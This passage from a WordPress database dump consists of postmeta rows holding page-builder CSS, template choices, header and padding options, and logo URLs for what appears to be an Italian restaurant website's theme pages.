30px'),(24178,3037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24179,3037,'_wp_page_template','default'),(24180,3037,'slide_template','default'),(24181,3037,'_wpb_vc_js_status','false'),(24182,3037,'mkdf_page_content_behind_header_meta','no'),(24183,3037,'mkdf_disable_vertical_header_background_image_meta','no'),(24184,3037,'mkdf_disable_header_widget_areas_meta','no'),(24185,3037,'mkdf_title_area_type_meta','attika'),(24186,3037,'mkdf_menu_area_background_color_meta','#ffffff'),(24187,3037,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24188,3037,'mkdf_page_content_padding','120px 0px 86px 0px'),(24189,3038,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24190,3038,'_wp_page_template','full-width.php'),(24191,3038,'slide_template','default'),(24192,3038,'_wpb_vc_js_status','true'),(24193,3038,'mkdf_page_content_behind_header_meta','no'),(24194,3038,'mkdf_disable_vertical_header_background_image_meta','no'),(24195,3038,'mkdf_disable_header_widget_areas_meta','no'),(24196,3038,'mkdf_page_content_padding','80px 0 110px'),(24197,3039,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24198,3039,'_wp_page_template','full-width.php'),(24199,3039,'slide_template','default'),(24200,3039,'_wpb_vc_js_status','false'),(24201,3039,'mkdf_page_content_behind_header_meta','no'),(24202,3039,'mkdf_disable_vertical_header_background_image_meta','no'),(24203,3039,'mkdf_disable_header_widget_areas_meta','no'),(24204,3040,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}'),(24206,3040,'_wp_page_template','full-width.php'),(24207,3040,'slide_template','default'),(24208,3040,'_wpb_vc_js_status','true'),(24209,3040,'mkdf_page_content_behind_header_meta','no'),(24210,3040,'mkdf_page_content_padding','100px 0 0 0'),(24211,3040,'mkdf_page_content_padding_mobile','100px 0 0 0'),(24212,3040,'mkdf_header_type_meta','header-divided'),(24213,3040,'mkdf_disable_vertical_header_background_image_meta','no'),(24214,3040,'mkdf_disable_header_widget_areas_meta','no'),(24215,3040,'mkdf_show_title_area_meta','no'),(24216,3040,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}'),(44583,3980,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}'),(24217,3040,'mkdf_menu_area_background_color_meta','#f8f2ed'),(24218,3040,'mkdf_menu_area_height_meta','70px'),(24219,3040,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(24220,3040,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(24221,3040,'mkdf_custom_sticky_menu_area_sidebar_meta','custom-sticky'),(24222,3040,'mkdf_smooth_page_transitions_meta','yes'),(24223,3040,'mkdf_page_transition_preloader_meta','yes'),(24224,3040,'mkdf_smooth_pt_spinner_type_meta','pulse'),(24225,3040,'mkdf_smooth_pt_spinner_color_meta','#000000'),(24226,3041,'_wpb_shortcodes_custom_css','.vc_custom_1535460622871{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534147387272{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534152695378{padding-top: 65px !important;padding-bottom: 160px !important;}.vc_custom_1535985514307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535461280310{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535459248703{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1533043384159{padding-top: 4px !important;}.vc_custom_1533043390970{padding-top: 4px !important;}.vc_custom_1533043398297{padding-top: 4px !important;}.vc_custom_1533043409686{padding-top: 4px !important;}.vc_custom_1533043430614{padding-top: 4px !important;}.vc_custom_1533027694804{margin-top: -120px !important;}.vc_custom_1533813662568{padding-top: 39% !important;padding-right: 31% !important;}.vc_custom_1534936187501{margin-top: -97px !important;padding-left: 12% !important;}.vc_custom_1533029626211{padding-top: 30px !important;}.vc_custom_1537283902655{margin-top: -125px !important;}.vc_custom_1536848053140{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151757973{padding-right: 0px !important;}.vc_custom_1534151543242{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534150759198{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151021205{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534163280454{padding-right: 0px !important;padding-left: 0px !important;}'),(24227,3041,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24228,3041,'_wp_page_template','full-width.php'),(24229,3041,'slide_template','default'),(24230,3041,'_wpb_vc_js_status','true'),(24231,3041,'mkdf_page_content_behind_header_meta','no'),(24232,3041,'mkdf_disable_vertical_header_background_image_meta','no'),(24233,3041,'mkdf_disable_header_widget_areas_meta','yes'),(24234,3041,'mkdf_page_content_padding','0'),(24235,3041,'_wpb_shortcodes_custom_css','.vc_custom_1535460622871{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534147387272{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534152695378{padding-top: 65px !important;padding-bottom: 160px !important;}.vc_custom_1535985514307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535461280310{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535459248703{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1533043384159{padding-top: 4px !important;}.vc_custom_1533043390970{padding-top: 4px !important;}.vc_custom_1533043398297{padding-top: 4px !important;}.vc_custom_1533043409686{padding-top: 4px !important;}.vc_custom_1533043430614{padding-top: 4px !important;}.vc_custom_1533027694804{margin-top: -120px !important;}.vc_custom_1533813662568{padding-top: 39% !important;padding-right: 31% !important;}.vc_custom_1534936187501{margin-top: -97px !important;padding-left: 12% !important;}.vc_custom_1533029626211{padding-top: 30px !important;}.vc_custom_1537283902655{margin-top: -125px !important;}.vc_custom_1536848053140{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151757973{padding-right: 0px !important;}.vc_custom_1534151543242{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534150759198{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534151021205{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534163280454{padding-right: 0px !important;padding-left: 0px !important;}'),(24236,3041,'mkdf_show_title_area_meta','no'),(24237,3041,'mkdf_logo_image_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(24238,3041,'mkdf_logo_image_dark_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(24239,3041,'mkdf_logo_image_light_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-logo-center-1png.png'),(24240,3041,'mkdf_logo_image_sticky_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(24241,3041,'mkdf_logo_image_mobile_meta','https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png'),(24242,3041,'_wpb_post_custom_css','.mkdf-page-header .mkdf-logo-area .mkdf-logo-wrapper a,\n.mkdf-page-header .mkdf-menu-area .mkdf-logo-wrapper a {\n    max-height: 125px;\n}\n\n@media only screen and (min-width: 1025px) {\n    .home-two-second-row,\n    .home-two-third-row {\n        display: none;\n    }\n}\n\n@media only screen and (max-width: 1024px) {\n    .home-two-first-row {\n        display: none;\n    }\n}'),(24243,3041,'mkdf_header_behaviour_meta','sticky-header-on-scroll-up'),(24244,3041,'mkdf_smooth_page_transitions_meta','yes'),(24245,3041,'mkdf_page_transition_preloader_meta','yes'),(24246,3041,'mkdf_smooth_pt_spinner_type_meta','pulse'),(24247,3041,'mkdf_smooth_pt_spinner_color_meta','#000000'),(24248,3042,'_wpb_shortcodes_custom_css','.vc_custom_1535379851915{margin-bottom: -90px !important;padding-top: 80px !important;}.vc_custom_1537284312649{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534432930786{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534433450023{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1535633159717{padding-bottom: 200px !important;}.vc_custom_1534515728554{margin-top: -90px !important;margin-bottom: -90px !important;}'),(24249,3042,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24250,3042,'_wp_page_template','full-width.php'),(24251,3042,'slide_template','default'),(24252,3042,'_wpb_vc_js_status','true'),(24253,3042,'mkdf_page_content_behind_header_meta','no'),(24254,3042,'mkdf_disable_vertical_header_background_image_meta','no'),(24255,3042,'mkdf_disable_header_widget_areas_meta','no'),(24256,3042,'_wpb_shortcodes_custom_css','.vc_custom_1535379851915{margin-bottom: -90px !important;padding-top: 80px !important;}.vc_custom_1537284312649{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534432930786{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1534433450023{padding-top: 130px !important;padding-bottom: 130px !important;}.vc_custom_1535633159717{padding-bottom: 200px !important;}.vc_custom_1534515728554{margin-top: -90px !important;margin-bottom: -90px !important;}'),(24257,3042,'mkdf_page_content_padding','0'),(24258,3042,'mkdf_header_type_meta','header-bottom'),(24259,3042,'mkdf_show_title_area_meta','no'),(24260,3042,'mkdf_menu_area_side_padding_meta','30px'),(24261,3042,'mkdf_page_slider_meta','[rev_slider alias=\"seafood-restaurant\"]'),(24262,3043,'_wpb_shortcodes_custom_css','.vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}'),(24264,3043,'_wp_page_template','full-width.php'),(24265,3043,'slide_template','default'),(24266,3043,'_wpb_vc_js_status','true'),(24267,3043,'mkdf_page_content_behind_header_meta','no'),(24268,3043,'mkdf_disable_vertical_header_background_image_meta','no'),(24269,3043,'mkdf_disable_header_widget_areas_meta','no'),(24270,3043,'mkdf_page_content_padding','0'),(24271,3043,'mkdf_header_type_meta','header-divided'),(24272,3043,'mkdf_show_title_area_meta','no'),(24273,3043,'mkdf_menu_area_background_color_meta','#ffffff'),(24274,3043,'mkdf_menu_area_background_transparency_meta','1'),(24275,3043,'mkdf_menu_area_height_meta','80'),(24276,3043,'mkdf_disable_footer_meta','yes'),(24277,3043,'mkdf_header_behaviour_meta','fixed-on-scroll'),(24278,3043,'_wpb_shortcodes_custom_css','.vc_custom_1533285714962{padding-right: 0px !important;padding-left: 0px !important;}'),(24279,3044,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24280,3044,'_wp_page_template','default'),(24281,3044,'slide_template','default'),(24282,3044,'_wpb_vc_js_status','false'),(24283,3044,'mkdf_page_content_behind_header_meta','no'),(24284,3044,'mkdf_disable_vertical_header_background_image_meta','no'),(24285,3044,'mkdf_disable_header_widget_areas_meta','no'),(24286,3044,'mkdf_show_title_area_meta','yes'),(24287,3044,'mkdf_title_area_type_meta','attika'),(24288,3044,'mkdf_menu_area_background_color_meta','#ffffff'),(24289,3044,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24290,3044,'mkdf_page_content_padding','150px 0'),(24291,3045,'_wpb_shortcodes_custom_css','.vc_custom_1535549530866{padding-top: 50px !important;padding-bottom: 120px !important;}'),(24292,3045,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24293,3045,'_wp_page_template','full-width.php'),(24294,3045,'slide_template','default'),(24295,3045,'_wpb_vc_js_status','true'),(24296,3045,'mkdf_page_content_behind_header_meta','no'),(24297,3045,'mkdf_disable_vertical_header_background_image_meta','no'),(24298,3045,'mkdf_disable_header_widget_areas_meta','no'),(24299,3045,'mkdf_show_title_area_meta','yes'),(24300,3045,'mkdf_title_area_type_meta','attika'),(24301,3045,'mkdf_menu_area_background_color_meta','#ffffff'),(24302,3045,'_wpb_shortcodes_custom_css','.vc_custom_1535549530866{padding-top: 50px !important;padding-bottom: 120px !important;}'),(24303,3045,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24304,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(24305,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24306,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(24307,3046,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24308,3046,'_wp_page_template','full-width.php'),(24309,3046,'slide_template','default'),(24310,3046,'_wpb_vc_js_status','true'),(24311,3046,'mkdf_page_content_behind_header_meta','no'),(24312,3046,'mkdf_disable_vertical_header_background_image_meta','no'),(24313,3046,'mkdf_disable_header_widget_areas_meta','no'),(24314,3046,'mkdf_show_title_area_meta','yes'),(24315,3046,'mkdf_title_area_type_meta','attika'),(24316,3046,'mkdf_menu_area_background_color_meta','#ffffff'),(24317,3046,'_wpb_shortcodes_custom_css','.vc_custom_1535549496113{padding-top: 50px !important;padding-bottom: 120px !important;}'),(24318,3046,'_dp_original','377'),(24319,3046,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24320,3047,'_wpb_shortcodes_custom_css','.vc_custom_1535372522645{padding-right: 80px !important;padding-left: 80px !important;}'),(24321,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24322,3047,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24323,3047,'_wp_page_template','full-width.php'),(24324,3047,'slide_template','default'),(24325,3047,'_wpb_vc_js_status','true'),(24326,3047,'mkdf_page_content_behind_header_meta','no'),(24327,3047,'mkdf_disable_vertical_header_background_image_meta','no'),(24328,3047,'mkdf_disable_header_widget_areas_meta','no'),(24329,3047,'mkdf_show_title_area_meta','yes'),(24330,3047,'mkdf_title_area_type_meta','attika'),(24331,3047,'mkdf_menu_area_background_color_meta','#ffffff'),(24332,3047,'_dp_original','377'),(24333,3047,'mkdf_page_content_padding','80px 0 140px'),(24334,3047,'mkdf_page_content_padding_mobile','0px 0px 0px 0px'),(24335,3047,'_wpb_shortcodes_custom_css','.vc_custom_1535372522645{padding-right: 80px !important;padding-left: 80px !important;}'),(24336,3047,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24337,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(24339,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(24341,3048,'_wp_page_template','full-width.php'),(24342,3048,'slide_template','default'),(24343,3048,'_wpb_vc_js_status','true'),(24344,3048,'mkdf_page_content_behind_header_meta','no'),(24345,3048,'mkdf_disable_vertical_header_background_image_meta','no'),(24346,3048,'mkdf_disable_header_widget_areas_meta','no'),(24347,3048,'mkdf_page_content_padding','0'),(24348,3048,'mkdf_header_type_meta','header-divided'),(24349,3048,'mkdf_show_title_area_meta','no'),(24350,3048,'mkdf_menu_area_background_color_meta','#ffffff'),(24351,3048,'mkdf_menu_area_background_transparency_meta','1'),(24352,3048,'mkdf_menu_area_height_meta','80'),(24353,3048,'mkdf_disable_footer_meta','yes'),(24354,3048,'mkdf_header_behaviour_meta','fixed-on-scroll'),(24355,3048,'_wpb_shortcodes_custom_css','.vc_custom_1534510995016{padding-right: 0px !important;padding-left: 0px !important;}'),(24356,3048,'_dp_original','351'),(24357,3049,'_wpb_shortcodes_custom_css','.vc_custom_1535113284246{padding-top: 130px !important;}.vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}'),(24359,3049,'_wp_page_template','full-width.php'),(24360,3049,'slide_template',''),(24361,3049,'_wpb_vc_js_status','true'),(24362,3049,'mkdf_page_content_behind_header_meta','no'),(24363,3049,'mkdf_disable_vertical_header_background_image_meta','no'),(24364,3049,'mkdf_disable_header_widget_areas_meta','no'),(24365,3049,'_wpb_shortcodes_custom_css','.vc_custom_1535113284246{padding-top: 130px !important;}.vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}'),(24366,3049,'mkdf_page_content_padding','0'),(24367,3049,'mkdf_header_type_meta','header-divided'),(24368,3049,'mkdf_show_title_area_meta','no'),(24369,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(24370,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24371,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(24372,3050,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24373,3050,'_wp_page_template','full-width.php'),(24374,3050,'slide_template','default'),(24375,3050,'_wpb_vc_js_status','true'),(24376,3050,'mkdf_page_content_behind_header_meta','no'),(24377,3050,'mkdf_disable_vertical_header_background_image_meta','no'),(24378,3050,'mkdf_disable_header_widget_areas_meta','no'),(24379,3050,'_wpb_shortcodes_custom_css','.vc_custom_1535634921180{padding-top: 130px !important;padding-bottom: 120px !important;}.vc_custom_1534159322757{padding-bottom: 90px !important;}.vc_custom_1533304689022{padding-bottom: 60px !important;}.vc_custom_1535112631536{padding-right: 5% !important;padding-left: 5% !important;}.vc_custom_1534163857016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165933476{padding-right: 0px !important;}.vc_custom_1535112595718{margin-left: 0px !important;padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110087401{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535110136872{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}'),(24380,3050,'mkdf_page_content_padding','0'),(24381,3050,'mkdf_header_type_meta','header-divided'),(24382,3050,'_dp_original','430'),(24383,3050,'mkdf_show_title_area_meta','no'),(24384,3051,'_wpb_shortcodes_custom_css','.vc_custom_1534508236123{padding-right: 0px !important;}'),(24385,3051,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24386,3051,'_wp_page_template','full-width.php'),(24387,3051,'slide_template','default'),(24388,3051,'_wpb_vc_js_status','true'),(24389,3051,'mkdf_page_content_behind_header_meta','no'),(24390,3051,'mkdf_disable_vertical_header_background_image_meta','no'),(24391,3051,'mkdf_disable_header_widget_areas_meta','no'),(24392,3051,'mkdf_show_title_area_meta','no'),(24393,3051,'mkdf_page_content_padding','0'),(24394,3051,'_wpb_shortcodes_custom_css','.vc_custom_1534508236123{padding-right: 0px !important;}'),(24395,3051,'mkdf_disable_footer_meta','yes'),(24396,3052,'_wpb_shortcodes_custom_css','.vc_custom_1533721367903{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1534512863336{padding-left: 0px !important;}'),(24397,3052,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24398,3052,'_wp_page_template','full-width.php'),(24399,3052,'slide_template','default'),(24400,3052,'_wpb_vc_js_status','true'),(24401,3052,'mkdf_page_content_behind_header_meta','no'),(24402,3052,'mkdf_page_content_padding','130px 0 0 '),(24403,3052,'mkdf_disable_vertical_header_background_image_meta','no'),(24404,3052,'mkdf_disable_header_widget_areas_meta','no'),(24405,3052,'mkdf_show_title_area_meta','no'),(24406,3052,'_wpb_shortcodes_custom_css','.vc_custom_1533721367903{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1534512863336{padding-left: 0px !important;}'),(24407,3053,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24408,3053,'_wp_page_template','full-width.php'),(24409,3053,'slide_template','default'),(24410,3053,'_wpb_vc_js_status','true'),(24411,3053,'mkdf_page_content_behind_header_meta','no'),(24412,3053,'mkdf_page_content_padding','0 0 0 0'),(24413,3053,'mkdf_page_content_padding_mobile','0 0 0 0'),(24414,3053,'mkdf_header_type_meta','header-minimal'),(24415,3053,'mkdf_disable_vertical_header_background_image_meta','no'),(24416,3053,'mkdf_disable_header_widget_areas_meta','no'),(24417,3053,'mkdf_show_title_area_meta','no'),(24418,3053,'mkdf_disable_footer_meta','yes'),(24419,3053,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(24420,3054,'_wpb_shortcodes_custom_css','.vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}.vc_custom_1534508595924{margin-top: -130px !important;}'),(24423,3054,'_wp_page_template','full-width.php'),(24424,3054,'slide_template',''),(24425,3054,'_wpb_vc_js_status','true'),(24426,3054,'mkdf_page_content_behind_header_meta','no'),(24427,3054,'mkdf_page_content_padding','110px 0 0 '),(24428,3054,'mkdf_disable_vertical_header_background_image_meta','no'),(24429,3054,'mkdf_disable_header_widget_areas_meta','no'),(24430,3054,'_dp_original','513'),(24431,3054,'mkdf_show_title_area_meta','no'),(24432,3054,'_wpb_shortcodes_custom_css','.vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}.vc_custom_1534508595924{margin-top: -130px !important;}'),(24434,3055,'_wp_page_template','default'),(24435,3055,'slide_template','default'),(24436,3055,'_wpb_vc_js_status','true'),(24437,3055,'mkdf_page_content_behind_header_meta','no'),(24438,3055,'mkdf_disable_vertical_header_background_image_meta','no'),(24439,3055,'mkdf_disable_header_widget_areas_meta','no'),(24440,3055,'mkdf_show_title_area_meta','no'),(24441,3055,'mkdf_disable_footer_meta','yes'),(24442,3055,'mkdf_menu_area_in_grid_meta','yes'),(24443,3055,'mkdf_header_type_meta','header-minimal'),(24444,3055,'mkdf_page_content_padding','0 0 0 0'),(24445,3055,'mkdf_page_content_padding_mobile','0 0 0 0'),(24446,3055,'mkdf_custom_header_widget_area_two_meta','logo-fullscreen'),(24447,3056,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(24449,3056,'_wp_page_template','full-width.php'),(24450,3056,'slide_template','default'),(24451,3056,'_wpb_vc_js_status','true'),(24452,3056,'mkdf_page_content_behind_header_meta','no'),(24453,3056,'mkdf_page_content_padding','0 0 0 0'),(24454,3056,'mkdf_page_content_padding_mobile','0 0 0 0'),(24455,3056,'mkdf_header_type_meta','header-vertical'),(24456,3056,'mkdf_disable_vertical_header_background_image_meta','no'),(24457,3056,'mkdf_disable_header_widget_areas_meta','no'),(24458,3056,'mkdf_show_title_area_meta','no'),(24459,3056,'_wpb_shortcodes_custom_css','.vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}.vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}'),(24460,3056,'mkdf_custom_header_widget_area_one_meta','left-menu'),(24461,3056,'mkdf_disable_footer_meta','yes'),(24462,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px !important;}'),(24463,3057,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24464,3057,'_wpb_shortcodes_custom_css','.vc_custom_1533725150863{padding-top: 210px !important;padding-bottom: 200px !important;}.vc_custom_1534513038512{padding-bottom: 200px !important;}.vc_custom_1534514381983{padding-right: 0px !important;}.vc_custom_1534514542346{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514550307{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514557722{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534514436317{padding-left: 0px 